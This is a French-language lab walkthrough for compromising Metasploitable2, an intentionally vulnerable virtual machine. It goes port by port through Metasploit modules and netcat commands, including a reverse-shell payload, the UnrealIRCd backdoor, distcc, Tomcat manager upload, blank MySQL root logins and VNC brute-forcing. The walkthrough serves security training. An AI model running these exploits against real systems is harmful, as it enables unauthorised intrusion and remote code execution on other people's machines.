- Vue d’ensemble complète de Metasploitable2
- Exploitation de tous les ports dans différentes techniques :
- 22-.SSH
- 23-TELNET
- 25-SMTP
- Méthode 2
- 139&445 Netbios-SSN
- 1099-Java-.RMI
- Exploitation de java-RMI-server
- 1524-BINDSHELL
- Exploitation
- 2121-ProFTPD
- 3306-MYSQL
- 3632-DISTCCD
- Exploitation du port 3632 en utilisant distcc-.exec
- Exploitation de PostgreSQL avec postgre_payload
- 5900-VNC
- 6000-X11
- Exploitation du port 6000 en utilisant ssh
- 6667 & 6697 UnrealIRCD
- Méthode 1 : sur le port 6667
- Méthode 2 : Sur le port 6697
- 8180-TOMCAT
- Exploiter Apache-Tomcat
- 8787-Ruby-drb
Vue d’ensemble complète de Metasploitable2
Metasploitable est une machine virtuelle Linux intentionnellement vulnérable.
Cette VM peut être utilisée pour effectuer des formations en sécurité, tester des outils de sécurité et pratiquer des techniques courantes de test de pénétration.
Installation et configuration
Nous sommes ici pour exploiter Metasploitable 2 (Damn vulnerable machine for penetration testing)
Getter cette machine Metasploiable2 de https://information.rapid7.com/download-metasploitable-2017.html
Processus d’installation :
- Ouvrir VirtualBox et cliquer sur le bouton « Nouveau » pour créer une nouvelle machine virtuelle
- Taper le nom de la machine virtuelle(Metasploitable2)
- Allocation de la quantité de mémoire(préférable mais pas inférieure à 512mb)
- Sélectionner Utiliser un fichier de disque dur existant
- Sélectionner le fichier vmdk que vous avez téléchargé depuis Rapid7
- Cliquer sur Créer….! !! Installation réussie de Metasploitable2, Il est maintenant temps de configurer les paramètres du réseau.
Après l’installation, changez les paramètres de l’adaptateur réseau comme suit :
Réglage en réseau : Paramètres/Réseau/Adaptateur Sélectionnez Ethernet ou Sans fil
Dans l’onglet Avancé Sélectionnez : Promiscuous Mode comme Allow All
Démarrez la machine Metasploitable2 et Essayez de vous connecter en utilisant les informations d’identification données sur Banner… ! !!
Trouver l’adresse IP de la machine en utilisant la commande suivante dans le terminal
ifconfig
C’est tout pour la configuration….Commençons à pirater…
Scanning
Scanning de la Matasploitable 2
Comme nous l’avons remarqué l’adresse IP de la machine est 192.168.0.130
Commençons le scan avec Nmap qui fait partie de Kali Linux
nmap -sV -p- 192.168.0.130
use auxiliary/scanning/smtp/smtp_version (or) you can type use 0show optionsset RHOST 192.168.0.130exploit (or) runshow optionsset RHOST 192.168.0.130exploit (or) run
SMTP est l’abréviation de Simple Mail Transport Protocol et est un protocole de serveur à serveur.à serveur et conserve une base de données locale des utilisateurs auxquels il doit envoyer et recevoir des courriers électroniques.
SMTP possède un ensemble de commandes. Nous allons nous connecter à notre cible avec « netcat » à travers le port 25 et essayer d’acquérir cette base de données d’emails.
Ouvrir un nouveau terminal et taper :
nc 192.168.0.130 25
Maintenant que la connexion est établie vous pouvez vérifier par les commandes « SMTP »
Type: vrfy user
vrfy (C’est un shell noninteractive)
Pour les commandes SMTP, visitez : http://www.tcpipguide.com/free/t_SMTPCommands-2.htm
Méthode 2
Utilisation de smtp_enum
Ceci peut être fait par Metasploit
search smtp_enum
.
use auxiliary/scanner/smtp/smtp_enum
show optionsset RHOST 192.168.0.130exploit
Cette méthode utilise l’énumération pour trouver cette liste d’utilisateurs dans le service SMTP.
Plus tard, NetCat peut être utile pour obtenir une connexion inverse avec cet utilisateur.
139&445 Netbios-SSN
Samba est un projet open-source qui est largement utilisé sur les ordinateurs Linux et Unix afin qu’ils puissent travailler avec les services de fichiers et d’impression de Windows.
Nous pouvons même utiliser Samba comme un serveur actif pour gérer la connexion, l’authentification et le contrôle d’accès pour un réseau Windows.
Recherche d’exploit
use exploit/multi/samba/usermap_script
.
Pour visualiser les options de l’exploit
show optionsSet RHOST192.168.0.130 (Target IP address)
.
Définir la charge utile
Show payloadsSet payload cmd/unix/reverse
Définir les arguments requis pour la charge utile
.
Show optionsSet LHOST 192.168.0.109 (Attackers IP Address)Set LPORT 4444
Vérification une fois que tous les arguments requis sont remplis
exploit
1099-Java-.RMI
L’invocation de méthode à distance (RMI) est une API qui permet à un objet d’invoquer une méthode sur un objet qui existe dans un autre espace d’adressage, qui pourrait être sur la même machine ou sur une machine distante.
Exploitation de java-RMI-server
Recherche de l’exploit
search java_rmi_server
Choisissez l’exploit en fonction de leur rang. par exemple, « excellent » fonctionne mieux que « normal ».
use exploit/multi/misc/java_rmi_servershow optionsset RHOSTS <target's IP>exploit
Nous avons obtenu l’accès à la machine cible.
1524-BINDSHELL
Le shell de liaison est un type de shell dans lequel la machine cible ouvre un port de communication ou un écouteur sur la machine victime et attend une connexion entrante. L’attaquant se connecte alors à l’écouteur de la machine victime qui conduit ensuite à l’exécution de code ou de commande sur le serveur.
Exploitation
C’est un shell root donc on peut se connecter via le service netcat.
nc <target ip address> 1524
Congratulations, Vous êtes un utilisateur root maintenant.
2121-ProFTPD
Avant d’exploiter ce port, vous devez avoir des identifiants de connexion donc comme nous le savons la méthode l’obtenir par la technique de la force brute, Nous pouvons accéder à ProFTPd avec telnet, Nous utilisons ici l’utilisateur : user.
telnet <Taget IP Address> <Port Number>USER <username>
PASS <password>
C’est un utilisateur normal, Essayez l’escalade de privilège pour obtenir le contrôle root.
3306-MYSQL
Méthode 1 :
Recherche de l’exploit
search scanner/mysql/mysql_login
use auxiliary/scanner/mysql/mysql_login
.
Il y a parfois une chance d’avoir un mot de passe vide pour MySQL. Nous pouvons donc l’exploiter directement.
Note : par défaut, il affiche BLANK_PASSWORDS comme faux, mettez-le à vrai.
set BLANK_PASSWORDS as true
Méthode:2
Dans cette méthode, nous allons exploiter MySQL en utilisant cette commande en fournissant le nom d’utilisateur comme root et l’IP de la cible.
mysql -u root -h <target's IP>
3632-DISTCCD
Distcc est un outil permettant d’accélérer la compilation du code source en utilisant le calcul distribué sur un réseau informatique. Avec la bonne configuration
distcc peut réduire considérablement le temps de compilation d’un projet
Exploitation du port 3632 en utilisant distcc-.exec
Ouvrir la msfconsole et rechercher distcc_exec
search distcc_execshow options
Définir les arguments requis pour l’exploitation
set RHOSTS <target-ip>exploit
Nous avons obtenu un accès Shell…Essayez de faire une escalade de privilège pour un privilège plus élevé
Exploitation de PostgreSQL avec postgre_payload
Ouvrir msfconsole & chercher postgres_payload
.
search postgres_payloaduse exploit/linux/postgres/postgres_payloadshow options
Définir les arguments requis pour l’exploit
set RHOSTS <target-ip>
Par défaut, il utilisera le nom d’utilisateur postgres
exploit
Successivement connecté à postgresql…Obtenons un shell pour faire plus de choses…
Tentative d’escalade de privilèges…Bon apprentissage.. !!!
5900-VNC
Ouvrir msfconsole et chercher l’exploit vnc_login
search vnc_loginuse auxiliary/scanner/vnc/vnc_login
show optionsset RHOSTS <targets IP>set PASS_FILE <filepath that contains passwords>run (or) exploit
Cette méthode est utilisée pour exploiter un logiciel VNC hébergé sur des systèmes d’exploitation Linux ou Unix ou Windows avec une vulnérabilité d’authentification.
Tenter de se connecter vnc avec ce mot de passe
Ouvrir la visionneuse Vnc dans le Terminal &Taper l’adresse IP et se connecter
une invite de connexion apparaît. et demande de fournir des informations d’identification
Puis entrez le mot de passe et cliquez sur OK.
Voilaaa… !!! vous avez l’accès…Je sais ce que vous pensez en ce moment…Ne déconnez pas avec les choses autour..Happy Learning.
6000-X11
Le système X Window (alias X) est un système de fenêtrage pour les affichages bitmap, qui est commun sur les systèmes d’exploitation basés sur UNIX. X fournit le cadre de base pour un environnement basé sur une interface graphique.
Le serveur X11 distant accepte les connexions de n’importe quel endroit où l’on peut obtenir une connexion Internet. Il est responsable de l’accès aux cartes graphiques, aux périphériques d’entrée et à l’écran d’affichage de l’un ou l’autre ordinateur ou périphérique sans fil.
Exploitation du port 6000 en utilisant ssh
ssh -X -l msfadmin 192.168.0.122
Dans la commande ci-dessus, ‘X’ active tous les transferts de ports, en fournissant le nom d’utilisateur et l’IP de la cible nous donne le shell
6667 & 6697 UnrealIRCD
UnrealIRCd est un serveur IRC Open Source, au service de milliers de réseaux depuis 1999. Il fonctionne sous Linux, OS X et Windows
UnrealIRCd est un IRCd très avancé avec un fort accent sur la modularité, un fichier de configuration avancé et hautement configurable. Les principales fonctionnalités incluent SSL
UnrealIRCd est l’un des démons IRC les plus populaires et les plus complets, et il est utilisé sur le plus grand nombre de serveurs IRC
Ce serveur est décrit comme ayant probablement le plus de fonctionnalités de sécurité de tout serveur IRC.
Protocoles utilisés : Internet Relay Chat
Exploitons ce serveur IRC.
Méthode 1 : sur le port 6667
search unrealircduse exploit/unix/irc/unreal_ircd_3281_backdoorshow options
Définissons les arguments requis pour l’exploitation
set RHOSTS <target-ip>
.
par défaut, le numéro de port 6667 est attribué à exploit
run (or) exploit
Heyyy…On a une racine… On vit sur le fil du rasoir…
Méthode 2 : Sur le port 6697
Utiliser l’exploit ci-dessus et définir les arguments requis
- Cette fois, définir le port comme 6697
set RHOSTS <target-ip>set RPORT 6697
Et la deuxième fois aussi, nous avons eu le root…Essayez d’exploiter cela…Bon apprentissage
8180-TOMCAT
Apache Tomcat est une implémentation open-source des technologies Java Servlet, JavaServer Pages, Java Expression Language et WebSocket. Tomcat fournit un environnement de serveur web HTTP « pur Java » dans lequel le code Java peut s’exécuter.
Exploiter Apache-Tomcat
Il peut être réalisé en deux étapes :
Ouvrir la msfconsole & rechercher tomcat_mgr_login
search tomcat_mgr_loginset RHOSTS <target-ip>
show options
L’exploit attribuera des listes de noms d’utilisateurs &mots de passe par défaut. Après avoir défini les arguments de l’exploit Type exploit (ou) run
run
Prendre le même nom d’utilisateur et mot de passe et le donner à l’exploit suivant.
Recherche d’exploits de gestionnaire de tomcat
search tomcat_mgr_uploaduse exploit/multi/http/tomcat_mgr_uploadshow options
Définir RHOSTS, RPORT, et HttpPassword, HttpUsername que nous avons obtenu de l’exploit de connexion de tomcat et ensuite exécuter l’exploit.
msfconsole pourrait assigner la charge utile appropriée pour un exploit, C’est pourquoi nous avons le meterpreter…
8787-Ruby-drb
dRuby est un système d’objets distribués pour Ruby. Il est écrit en Ruby pur et utilise son protocole.
Aucun service complémentaire n’est nécessaire en dehors de ceux fournis par le runtime Ruby, comme les sockets TCP.
search drb_remote_codeexec
Définir les arguments requis pour exploiter
show optionsset RHOSTS <target-ip>exploit (or) run
Félicitations, vous avez obtenu l’accès shell root… essayez d’utiliser quelques commandes shell.